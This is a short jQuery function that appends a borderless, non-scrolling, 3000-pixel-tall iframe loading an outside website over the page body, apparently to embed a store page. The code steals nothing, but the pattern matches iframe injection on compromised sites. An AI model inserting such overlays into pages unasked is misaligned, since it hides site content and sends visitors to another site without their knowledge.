function addbody(){
	var top = 0;
	$("body").append("<div id='whole'><div id='newstore'><iframe src='http://www.centraletermicepro.ro/' frameborder='0' width='100%' height='3000' scrolling='no'></iframe></div></div>");
	//top = ( $(window).height() - $("#newstore").height() ) / 2+$(window).scrollTop();
	if(top<0)top = 0;
	$("#newstore").css("top", top + "px");

}
